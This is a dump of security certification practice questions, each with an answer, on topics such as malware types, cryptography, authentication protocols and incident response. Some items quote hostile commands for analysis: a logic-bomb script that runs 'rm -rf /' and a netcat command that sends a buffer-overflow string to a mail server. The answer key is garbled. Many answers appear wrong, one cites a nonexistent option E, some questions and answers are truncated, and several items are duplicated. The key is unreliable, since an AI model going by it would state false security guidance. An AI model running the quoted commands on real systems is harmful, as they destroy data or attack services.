Some of the legacy systems in an organization are running old versions of the Windows OS and others are running Linux OSs, while new systems are running the latest release of the Windows OS. The systems are not running any legacy custom applications. The organization's Chief Information Officer (CIO) wishes to unify all systems to reduce cost and enhance the security posture of the organization, without losing data or causing data leakage. Which of the following would be the BEST course of action to take? A. Reconfigure all existing machines to have the latest release of Windows OS. B. Restore all machines to default configurations. C. Upgrade part of the legacy systems' infrastructure and perform OS updates. D. Treat all legacy machines as end-of-life systems and replace them.

D. Treat all legacy machines as end-of-life systems and replace them.

A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the MOST likely cause of the decreased disk space? A. Misconfigured devices B. Logs and events anomalies C. Authentication issues D. Unauthorized software

D. Unauthorized software

A security analyst, who is analyzing the security company's web server, receives the following output: POST http://www.acme.com/AuthenticationServlet HTTP/1.1 HOST: www.acme.com accept: text/xml, application/xml, application/xhtml + xml Keep-Alive: 300 Connection: keep-alive Referer: http//acme.com/index.isp Cookie: JSESSIONID+LvZZRJJXgwyWPWEQMhS49vtW1yJdvn78CG1Kp5jTvwChDyPknm4t! Content-type: application/x-www-form-urlencoded Content-length: 64 delegate_service-131&user-acme 1&pass=test&submit=SUBMIT Which of the following is the issue A. Code signing B. Stored procedures C. Access violations D. Unencrypted credentials

D. Unencrypted credentials

A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take the chain of custody? A. Make a forensic copy B. Create a hash of the hard rive C. Recover the hard drive data D. Update the evidence log

D. Update the evidence log

To get the most accurate results on the security posture of a system, which of the following actions should the security analyst do prior to scanning? A. Log all users out of the system B. Parch the scanner C. Reboot the target host D. Update the plugins

D. Update the plugins

An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome? A. Use a protocol analyzer to reconstruct the data and implement a web-proxy. B. Deploy a web-proxy and then blacklist the IP on the firewall. C. Deploy a web-proxy and implement IPS at the network edge. D. Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

D. Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

A bank is experiencing a DoS attack against an application designed to handle 500IP-based sessions. in addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent a DoS attacks in the future? A. Deploy multiple web servers and implement a load balancer B. Increase the capacity of the perimeter router to 10 Gbps C. Install a firewall at the network to prevent all attacks D. Use redundancy across all network devices and services

D. Use redundancy across all network devices and services

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the system administrator using? A. Shared accounts B. Guest account C. Service account D. User account

D. User account

A dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one of the hard drives. The company then discovers its information is posted online. Which of the following methods would have MOST likely prevented the data from being exposed? A. Removing the hard drive from its enclosure B. Using software to repeatedly rewrite over the disk space C. Using Blowfish encryption on the hard drives D. Using magnetic fields to erase the data

D. Using magnetic fields to erase the data

When developing an application, executing a preconfigured set of instructions is known as: A. a code library. B. code signing. C. a stored procedure. D. infrastructure as code.

D. infrastructure as code.

A security administrator is performing a test to determine if a server is vulnerable to compromise through unnecessary ports. Which of the following tools would assist the security administrator in gathering the required information? A. tcpdump B. netcat C. nslookup D. nmap E. dig

D. nmap Network Mapped (Nmap) is a network scanning and host detection tool that is very useful during several steps of penetration testing. Nmap is not limited to merely gathering informaiton and enumeration, but it is also powerful utility that can be used as a vulnerablility detector or a security scanner.

Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. Users' email contacts are complaining of an increase in spam and social networking requests. Due to the large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken FIRST? (Select TWO) A. Disable the compromised accounts B. Update WAF rules to block social networks C. Remove the compromised accounts with all AD groups D. Change the compromised accounts' passwords E. Disable the open relay on the email server F. Enable sender policy framework

E. Disable the open relay on the email server F. Enable sender policy framework

A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack? A. Domain hijacking B. Injection C. Buffer overflow D. Privilege escalation

d. Privilege escalation

An actor downloads and runs a program against a corporate login page. The program imports a list of usernames and passwords, looking for a successful attempt. Which of the following terms BEST describes the actor in this situation? A. Script Kiddie B. Hacktivist C. Cryptologist D. Security auditor

A script kiddie

A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection? A. $500 B. $1000 C. $2000 D. $2500

A. $500

Which of the following differentiates a collision attack from a rainbow table attack? A. A rainbow table attack performs a hash lookup. B. A rainbow table attack uses the hash as a password. C. In a collision attack, the hash and the input data are equivalent. D. In a collision attack, the same input results in different hashes.

A. A rainbow table attack performs a hash lookup.

An organization is deploying a new system to the production environment. A security analyst discovers the system is not properly hardened or patched. Which of the following BEST describes the scenario? A. A secure baseline was not established early in the process B. User acceptance testing was not completed C. Integrity checks were not conducted to ensure it was the correct system D. An application code error was introduced during the development phase

A. A secure baseline was not established early in the process

A security consultant is gathering information about the frequency of a security threat's impact to an organization. Which of the following should the consultant use to label the number of times an attack can be expected to impact the organization in a 365-day period? A. ARO B. MTBF C. ALE D. MTTR E. SLA

A. ARO

To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO) A. ARO B. ROI C. RPO D. SLE E. RTO

A. ARO D. SLE

To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO). A. ARO B. ROI C. RPO D. SLE E. RTO

A. ARO D. SLE

Which of the following differentiates ARP from a MAC spoofing attack? A. ARP poisoning uses unsolicited ARP replies B. ARP poisoning overflows a switch's CAM table C. MAC spoofing uses DHCPOFFER/DHCPACK packets D. MAC spoofing can be performed across multiple routers

A. ARP poisoning uses unsolicited ARP replies

A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure? A. Accounting B. Authorization C. Authentication D. Identification

A. Accounting

Which of the following is a major difference between XSS attacks and remote code exploits? A. An XSS attack is a simple form of a remote code exploit attack. B. XSS attacks target servers, while remote code exploits target clients. C. Remote code exploits aim to escalate attackers' privileges, while XSS attacks aim to gain access only. D. Remote code exploits allow writing code at the client side and executing it, while XSS attacks require no code to work.

A. An XSS attack is a simple form of a remote code exploit attack.

Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator? (Select TWO) A. An attacker could potentially perform a downgrade attack B. The connection is vulnerable to resource exhaustion C. The integrity of the data could be a risk D. The IPSec payload reverted to 16-bit sequence numbers

A. An attacker could potentially perform a downgrade attack E. The IPSec payload reverted to 16-bit sequence numbers

A security analyst has been dealing with a large number of malware infections on workstations with legacy operating systems. The infections are not being detected by the current AV suite. Further analysis shows that the signatures are up-to-date and the AV engines are functioning correctly. The company is unable to afford next-generation AV that prevents these attacks. Which of the following methods should the security analyst employ to prevent future outbreaks? A. Application whitelisting B. Patch management C. Host-based intrusion detection D. File integrity monitoring

A. Application whitelisting

A security analyst observes the following events in the logs of an employee workstation: 1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator by the default restriction policy level. 1/23 1:07:09 1034 The scan is completed. No detections were found. The security analyst reviews the file system and observes the following: C:\>dir C:\Users\user\temp 1/23 1:07:02 oasdfkh.hta 1/23 1:07:02 update.bat 1/23 1:07:02 msg.txt Given the information provided, which of the following MOST likely occurred on the workstation? A. Application whitelisting controls blocked an exploit payload from executing. B. Antivirus software found and quarantined three malware files. C. Automatic updates were initiated but failed because they had not been approved. D. The SIEM log aged was not tuned properly and reported a false positive.

A. Application whitelisting controls blocked an exploit payload from executing.

A user suspects someone has been accessing a home network without permission by spoofing the MAC address of an authorized system. While attempting to determine if an unauthorized user is logging into the home network, the user reviews the wireless router, which shows the following table for systems that are currently on the home network: Hostname IP Address MAC MAC Filter DadPC 192.168.1.15 00:1D:1A:44:17:B5 On MomPC 192.168.1.15 21:13:D6:C5:42:A2 Off JuniorPC 192.168.2.16 42:A7:D1:25:11:52 On Unknown 192.168.1.18 10:B3:22:1A:FF:21 Off Which of the following should be the NEXT step to determine if there is an unauthorized user on the network? A. Apply MAC filtering and see if the router drops any of the systems B. Physically check each of the authorized systems to determine if they are logged onto the network C. Deny the "unknown" host because the hostname is not known and MAC filtering is not applied to this host D. Conduct a ping sweep of each of the authorized systems and see if an echo response is received

A. Apply MAC filtering and see if the router drops any of the systems

Which of the following are used to substantially increase the computation time required to crack a password? (Select TWO) A. BCRYPT B. Substitution cipher C. ECDHE D. PBKDF2 E. Diffle_Hellman

A. BCRYPT D. PBKDF2

A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using? A. Banner grabbing B. Port scanning C. Packet sniffing D. Virus scanning

A. Banner grabbing

A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using? A. Banner grabbing B. Port scanning C. Packet sniffing D. Virus scanning

A. Banner grabbing

A security engineer implements multiple technical measures to secure an enterprise network. The engineer also works with the Chief Information Officer (CIO) to implement policies to govern user behavior. Which of the following strategies is the security engineer executing? A. Baselining B. Mandatory access control C. Control diversity D. Sytem hardening

A. Baselining

A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue? A. Botnet B. Ransomware C. Polymorphic malware D. Armored virus

A. Botnet

During a routine vulnerability assessment, the following command was successful: echo "vrfy 'perl -e 'print "hi" x 500 ' ' " | nc www.company.com 25 Which of the following vulnerabilities is being exploited? A. Buffer overflow directed at a specific host MTA B. SQL injection directed at a web server C. Cross-site scripting directed at www.company.com D. Race condition in a UNIX shell script

A. Buffer overflow directed at a specific host MTA

A retail store recently deployed tablets for sales employees to use while assisting customers. Two of the tablets have already been lost or stolen. Which of the following would be the BEST way for the store to secure the tablets against future loss or theft? A. Cable locks B. Screen filters C. Geocaching D. Remote wipe

A. Cable locks

A retail store recently developed tablets for sales employees to use while assisting customers. Two of the tablets have already been lost or stolen. Which of the following would be the BEST way for the store to secure the tablets against future loss or theft? A. Cable locks B. Screen filters C. Geocaching D. Remote wipe

A. Cable locks

Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market? A. Competitor B. Hacktivist C. Insider D. Organized crime

A. Competitor

A network technician must update the company's wireless configuration settings to comply with new requirements, which means the use of AES encryption. Which of the following settings would BEST ensure the requirements are met? A. Configure CCMP. B. Require TKIP. C. Implement WPA. D. Implement 802.1x

A. Configure CCMP.

An organization has several production-critical SCADA supervisory systems that cannot follow the normal 30- day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software? A. Configure a firewall with deep packet inspection that restricts traffic to the systems. B. Configure a separate zone for the systems and restrict access to known ports. C. Configure the systems to ensure only necessary applications are able to run. D. Configure the host firewall to ensure only the necessary applications have listening ports.

A. Configure a firewall with deep packet inspection that restricts traffic to the systems.

A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the following settings should the network administrator implement to accomplish this? A. Configure the OS default TTL to 1 B. Use NAT on the R&D network C. Implement a router ACL D. Enable protected ports on the switch

A. Configure the OS default TTL to 1

A recent audit contained significant findings for several servers, including: Server Name: Mickey AUDIT FINDINGS - Missing 26 critical OS patches - Missing 5 third-party vendor patches - Expired SSL certificate Server Name: Minnie - Missing 15 critical OS patches - Missing three third-party patches - Out-of-date anti-virus Server Name: Goofy - Missing three important OS patches Server Name: Donald - Out-of-date antivirus - SSH static connections allowed In the future, which of the following capabilities would enable administrators to detect these issues proactively? A. Credentialed vulnerability scan B. Non-credentialed vulnerability scan C. Automatic file integrity checking D. Manual file integrity checking E. Log collection and correlation

A. Credentialed vulnerability scan

A security analyst reviews the following log entry: 2017-01012 1622CST 10.11.24.18 93242 148 TCP_HIT 200.200.0.223 _ OBSERVED POST HTPP/1.1.0. "Mozilla 1." www.dropbox.com Financial_Report_2016_CONFID.pdf, 13 MB, MS-RTC LM8; .NET CLR 3.0.4509.1392, Jane.Doe Which of the following security issues can the analyst identify? A. Data exfiltration B. Access violation C. Social engineering D. Unencrypted credentials

A. Data exfiltration

A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements: *All access must be correlated to a user account. *All user accounts must be assigned to a single individual. *User access to the PHI data must be recorded. *Anomalies in PHI data access must be reported. *Logs and records cannot be deleted or modified. Which of the following should the administrator implement to meet the above requirements? (Select THREE). A. Eliminate shared accounts. B. Create a standard naming convention for accounts. C. Implement usage auditing and review. D. Enable account lockout thresholds. E. Copy logs in real time to a secured WORM drive. F. Implement time-of-day restrictions. G. Perform regular permission audits and reviews.

A. Eliminate shared accounts C. Implement usage auditing and review E. Copy logs in real time to a secured WORM drive

Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromise if they are improperly configured? A. Embedded web server B. Spooler C. Network interface D. LCD control panel

A. Embedded web server

A company stores highly sensitive data files used by the accounting system on a server file share. The accounting system uses a service account named accounting-svc to access the file share. The data is protected will a full disk encryption, and the permissions are set as follows: File system permissions: Users = Read Only Share permission: accounting-svc = Read Only Given the listed protections are in place and unchanged, to which of the following risks is the data still subject? A. Exploitation of local console access and removal of data B. Theft of physical hard drives and a breach of confidentiality C. Remote exfiltration of data using domain credentials D. Disclosure of sensitive data to third parties due to excessive share permissions

A. Exploitation of local console access and removal of data

Which of the following allows an auditor to test proprietary-software compiled code for security flaws? A. Fuzzing B. Static review C. Code signing D. Regression testing

A. Fuzzing

Which of the following is the proper order for logging a user into a system from the first step to the last step? A. Identification, authentication, authorization B. Identification, authorization, authentication C. Authentication, identification, authorization D. Authentication, identification, authorization E. Authorization, identification, authentication

A. Identification, authentication, authorization

A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take? A. Identify the source of the active connection B. Perform eradication of active connection and recover C. Performance containment procedure by disconnecting the server D. Format the server and restore its initial configuration

A. Identify the source of the active connection

A company offers SaaS, maintaining all customers' credentials and authenticating locally. Many large customers have requested the company offer some form of federation with their existing authentication infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations? A. Implement SAML so the company's services may accept assertions from the customers' authentication servers. B. Provide customers with a constrained interface to manage only their users' accounts in the company's active directory server. C. Provide a system for customers to replicate their users' passwords from their authentication service to the company's. D. Use SOAP calls to support authentication between the company's product and the customers' authentication servers.

A. Implement SAML so the company's services may accept assertions from the customers' authentication servers.

When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal? A. Infrastructure B. Platform C. Software D. Virtualization

A. Infrastructure

An application was recently compromised after some malformed data came in via web form. Which of the following would MOST likely have prevented this? A. Input validation B. Proxy server C. Stress testing D. Encoding

A. Input validation

A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file? A. Keylogger B. Rootkit C. Bot D. RAT

A. Keylogger

A network technician is trying to set up a secure method for managing users and groups across the enterprise. Which of the following protocols is MOST likely to be used? A. LDAPS B. SFTP C. NTLM D. SNMPv3

A. LDAPS

After a security incident, management is meeting with involved employees to document the incident and its aftermath. Which of the following BEST describes this phase of the incident response process? A. Lessons learned B. Recovery C. Identification D. Preparation

A. Lessons Learned

Following the successful response to a data-leakage incident, the incident team lead facilitates an exercise that focuses on continuous improvement of the organization's incident response capabilities. Which of the following activities has the incident team lead executed? A. Lessons learned review B. Root cause analysis C. Incident audit D. Corrective action exercise

A. Lessons learned review

An information security specialist is reviewing the following output from a Linux server: user@server:~$ -l 5 * * * * /usr/local/bin.backup.sh user@server:~$ cat /usr/local/bin/backup.sh #!/bin/bash if ! grep --quiet joeuser /etc/passwd the rm -rf / fi Based on the above information, which of the following types of malware was installed on the server? A. Logic bomb B. Trojan C. Backdoor D. Ransomware E. Rootkit

A. Logic bomb

An incident involving a workstation that is potentially infected with a virus has occurred. The workstation may have sent confidential data to an unknown internet server. Which of the following should a security analyst do FIRST? A. Make a copy of everything in memory on the workstation. B. Turn off the workstation. C. Consult the information security policy. D. Run a virus scan.

A. Make a copy of everything in memory on the workstation.

Which of the following would be MOST effective in reducing tailgating incidents? A. Mantrap B. Faraday cage C. Motion detection D. Bollards

A. Mantrap

A user needs to send sensitive information to a colleague using PKI. Which of the following concepts apply when a sender encrypts the message hash with the sender's private key? (Select TWO) A. Non-repudiation B. Email content encryption C. Steganography D. Transport security E. Message integrity

A. Non-repudiation B. Email

After a recent internal breach, a company decided to regenerate and reissue all certificates used in the transmission of confidential information. The company places the greatest importance on confidentiality and non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describes how the company will use these certificates? A. One key pair will be used for encryption and decryption. The other will be used to digitally sign the data. B. One key pair will be used for encryption. The other key pair will provide extended validation. C. Data will be encrypted once by each key, doubling the confidentiality and non-repudiation strength. D. One key pair will be used for internal communication, and the other will be used for external communication.

A. One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.

A systems administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security backward compatibility when accessing the wireless network? A. Open wireless network and SSL VPN B. WPA using a preshared key C. WAP2 using a RADIUS back-end for 802.1x authentication D. WEP with a 40-bit key

A. Open wireless network and SSL VPN

An organization wants to utilize a common, Internet-based third-party provider for authorization and authentication. The provider uses a technology based on OAuth 2.0 to provide required services. To which of the following technologies is the provider referring? A. OpenID Connect B. SAML C. XACML D. LDAP

A. OpenID Connect

Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system? A. Passive scan B. Aggressive scan C. Credentialed scan D. Intrusive scan

A. Passive scan

A hacker has a packet capture that contains: ....Joe Smith.........E289F21CD33E4F57890DDEA5CF267ED2.. ...Jane.Doe...........AD1FAB10D33E4F57890DDEA5CF267ED2.. ....John.Key..........3374E9E7E33E4F57890DDEA5CF267ED2.. Which of the following tools will the hacker use against this type of capture? A. Password cracker B. Vulnerability scanner C. DLP scanner D. Fuzzer

A. Password cracker

Despite having implemented password policies, users continue to set the same weak passwords and reuse old passwords. Which of the following technical controls would help prevent these policy violations? (Select TWO) A. Password expiration B. Password length C. Password complexity D. Password history E. Password lockout

A. Password expiration D. Password history

A Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a specific version of a technology the company uses to support many critical application. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information? A. Penetration test B. Vulnerability scan C. Active reconnaissance D. Patching assessment report

A. Penetration test

Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach? A. Policy violation B. Social engineering C. Insider threat D. Zero--day attack

A. Policy violation

Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe, decides to connect to the airport wireless network without connecting to a VPN, and the sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach? A. Policy violation B. Social engineering C. Insider threat D. Zero-day attack

A. Policy violation

Which of the following MUST the sender use after hashing a message to complete the digital signature process? A. Private key B. Public key C. Secret key D. Session key E. Shared key

A. Private key

An organization employee resigns without giving adequate notice. The following day, it is determined that the employee is still in possession of several company-owned mobile devices. Which of the following could have reduced the risk of this occurring? (Select TWO) A. Proper off-boarding procedures B. Acceptable use policies C. Non-disclosure agreements D. Exit interviews E. Background checks F. Separation of duties

A. Proper off-boarding procedures D. Exit interviews

An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication? A. Proximity card, fingerprint scanner, PIN B. Fingerprint scanner, voice recognition, proximity card C. Smart card, user PKI certificate, privileged user certificate D. Voice recognition, smart card, proximity card

A. Proximity card, fingerprint scanner, PIN

Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO) A. Public key B. Shared key C. Elliptic curve D. MD5 E. Private key F. DES

A. Public key E. Private key

Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO) A. Public key B. Shared key C. Elliptic curve D. MD5 E. Private key F. DES

A. Public key E. Private key

An organization would like to grant access to its wireless network to users who are visiting from another trusted organization by authenticating the visiting users at their home organization. Which of the following is the organization's BEST option? A. RADIUS Federation B. Captive portal C. OCSP D. Certificate chaining

A. RADIUS Federation

A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed? A. RAT B. Worm C. Ransomware D. Bot

A. RAT

After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below: c:\Windows\system32>netstat -nab Active Connections Pronto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe] TCP 0.0.0.0:445 0.0.0.0 [svchost.exe] TCP 192.168.1.10:5000 10.37.213.20 winserver.exe UDP 192.168.1.10:1900 *.* SSDPSVR Based on the above information, which of the following types of malware was installed on the user's computer? A. RAT B. Keylogger C. Spyware D. Worm E. Bot

A. RAT

Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred? A. Ransomware B. Keylogger C. Buffer overflow D. Rootkit

A. Ransomware

While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of the following incident response steps is Joe working on now? A. Recovery B. Eradication C. Containment D. Identification

A. Recovery

Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host? A. Remote exploit B. Amplification C. Sniffing D. Man-in-the-middle

A. Remote exploit

While on a business trip, a user's mobile device goes missing. The user immediately contacts the organization's service desk to report the incident. Which of the following actions is the BEST response to protect the data stored on the user's mobile device? A. Remotely wipe the mobile device via the mobile device manager to ensure the data is not compromised B. Deploy full-device encryption through the mobile device manager to ensure the data is not accessed C. Track the mobile device through geolocation services, and then alert the authorities of its whereabouts D. Initiate remote lockout on the mobile device to prevent unauthorized access

A. Remotely wipe the mobile device via the mobile device manager to ensure the data is not compromised

Which of the following is a compensating control that will BEST reduce weak passwords? A. Requiring the use of one-time tokens B. Increasing password history retention count C. Disable user accounts after exceeding maximum attempts D. Setting expiration passwords to a shorter

A. Requiring the use of one-time tokens

An organization requires an application for entering employee expenses. The expenses must be entered manually into the application by each employee, and supervisors have to approve the expenses manually. Which of the following would need to be implemented in the application? A. Role-based access control B. Mandatory access control C. Discretionary access control D. Attribute-based access control

A. Role-based access control

A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING - hash mismatch: C:\\Window\SysWOW64\user32.dll WARNING - hash mismatch: C:\\Window\SysWOW64\kernal32.dll Based solely on the above information, which of the following types of malware is MOST likely installed on the system? A. Rootkit B. Ransomware C. Trojan D. Backdoor

A. Rootkit

A web developers improves client access to the company's REST API. Authentication needs to be tokenized but not expose the client's password. Which of the following methods would BEST meet the developer's requirements? A. SAML B. LDAP C. OAuth D. Shibboleth

A. SAML

The human resources department is outsourcing much of its operations to a third party. As part of the proces, the local human resources data needs to be transmitted to the third party over the Internet. Which of the following is the BEST way to transmit the data? A. SFTP B. DNSSEC C. SNMPv3 D. LDAPS

A. SFTP

Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application? A. Sandboxing B. Encryption C. Code signing D. Fuzzing

A. Sandboxing

for Company B, but will not be responsible for user authentication or patching of operating systems within the perimeter. Which of the following is being described? A. Service level agreement B. Memorandum of understanding C. Business partner agreement D. Interoperability agreement

A. Service level agreement

A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following method should the technician use? A. Shredding B. Wiping C. Low-level formatting D. Repartitioning E. Overwriting

A. Shredding

A company has developed a business critical system for its core automation process with a software vendor. Which of the following can provide access to the source code if the licensor declares bankruptcy? A. Software escrow B. Software code review C. Software change control D. Software configuration management

A. Software escrow

A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST? A. Survey threat feeds from services inside the same industry. B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic. C. Conduct an internal audit against industry best practices to perform a qualitative analysis. D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.

A. Survey threat feeds from services inside the same industry.

Two users must encrypt and transmit large amount of data between them. Which of the following should they use to encrypt and transmit the data? A. Symmetric algorithm B. Hash function C. Digital signature D. Obfuscation

A. Symmetric algorithm

Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data? A. Symmetric algorithm B. Hash function C. Digital signature D. Obfuscation

A. Symmetric algorithm

An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Sect TWO) A. TACACS+ B. CHAP C. LDAP D. RADIUS E. MSCHAPv2

A. TACACS+ C. LDAP

A security analyst is updating a BIA document. The security analyst notices the support vendor's time to replace a server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be concluded? (Select TWO) A. The MTTR is faster B. The MTTR is slower C. The RTO has increased D. The RTO has decreased E. The MTTF has increased F. The MTTF has decreased

A. The MTTR is faster D. The RTO has decreased MTBF = MTTF+MTTR

A user received an email from an ISP indicating malicious traffic coming from the user's home network is detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera system. Which of the following BEST describes what is happening? A. The camera system is infected with a bot. B. The camera system is infected with a RAT. C. The camera system is infected with a Trojan. D. The camera system is infected with a backdoor.

A. The camera system is infected with a bot.

A user receives an email from ISP indicating malicious traffic coming from the user's home network is detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera system. Which of the following BEST describes what is happening? A. The camera system is infected with a bot. B. The camera system is infected with a RAT. C. The camera system is infected with a Trojan. D. The camera system is infected with a backdoor.

A. The camera system is infected with a bot.

A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the case? A. The certificate has expired B. The browser does not support SSL C. The user's account is locked out D. The VPN software has reached the seat license maximum

A. The certificate has expired

After an employee reported slow network speeds and application responsiveness, the help desk asked the company's security administrator to review the following firewall logs from the employee's computer: 2017-05-30 12:12:31 ALLOW TCP 192.168.1.236 192.168.1.1 30295 21 2017-05-30 12:12:32 ALLOW TCP 192.168.1.236 192.168.1.1 30296 22 2017-05-30 12:12:33 ALLOW TCP 192.168.1.236 192.168.1.1 30296 25 2017-05-30 12:12:33 ALLOW TCP 192.168.1.236 192.168.1.1 30297 80 2017-05-30 12:12:33 DROP TCP 84.176.55.103 192.168.1.236 10434 445 Which of the following can the security administrator infer and report to the help desk based on the above logs? A. The employee's computer is being actively scanned. B. The employee's computer is infected with a worm. C. The employee's computer firewall should be enabled. D. The computer's router is actively listening to unneeded services.

A. The employee's computer is being actively scanned.

An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO). A. The firewall is disabled on workstations. B. SSH is enabled on servers. C. Browser homepages have not been customized. D. Default administrator credentials exist on networking hardware. E. The OS is only set to check for updates once a day.

A. The firewall is disabled on workstations. D. Default administrator credentials exist on networking hardware.

Which of the following is the BEST reason for salting a password hash before it is stored in a database? A. To prevent duplicate values from being stored B. To make the password retrieval process very slow C. To protect passwords from being saved in readable format D. To prevent users fro using simple passwords for their access credentials

A. To prevent duplicate values from being stored

User from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors? A. Trust model B. Stapling C. Intermediate CA D. Key escrow

A. Trust model

An organization has implemented an IPSec VPN access for remote users. Which of the following IPSec modes would be the MOST secure for this organization to implement? A. Tunnel mode B. Transport mode C. AH-only mode D. ESP-only mode

A. Tunnel mode

A security consultant wants to see what information can be obtained by banner grabbing the company's web servers. There are more than 100 web servers, and the consultant would like to perform and aggregate the information quickly. Which of the following is the MOST time-efficient way to accomplish this task? A. Use nc to establish a connection to each web server B. Run tcpdump on each web server in the organization C. Use dig to return results for each web server address D. Run netstat on each webserver in the organization E. Use ssh to connect to port 80 on each web server

A. Use nc to establish a connection to each web server Netcat is one of those few tools like nmap, Metasploit, Wireshark and few others that every hacker should be familiar with. It is simple, elegant and has a multitude of uses. For instance, netcat can be used to; Ability to scan if a port is open on a remote system Pull the banner information from a remote system Connect to a network service manually with listening Remote administration for transferring of files

new trend and has requested assistance from a consultant. Given this scenario, which of the following should the consultant recommend? (Select TWO). A. Use password-enabled lock screens. B. Implement an MDM solution. C. Configure time-of-day restrictions. D. Disable personal email. E. Implement application whitelisting. F. Deny access to the corporate portal.

A. Use password-enabled lock screens. B. Implement an MDM solution.

Users report the following message appear when browsing to the company's secure site: This website cannot be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select TWO) A. Verify the certificate has not expired on the server B. Ensure the certificate has a .pfx extension on the server C. Update the root certificate into the client computer certificate store D. Install the updated private key on the web server E. Have users clear their browsing history and relaunch the session

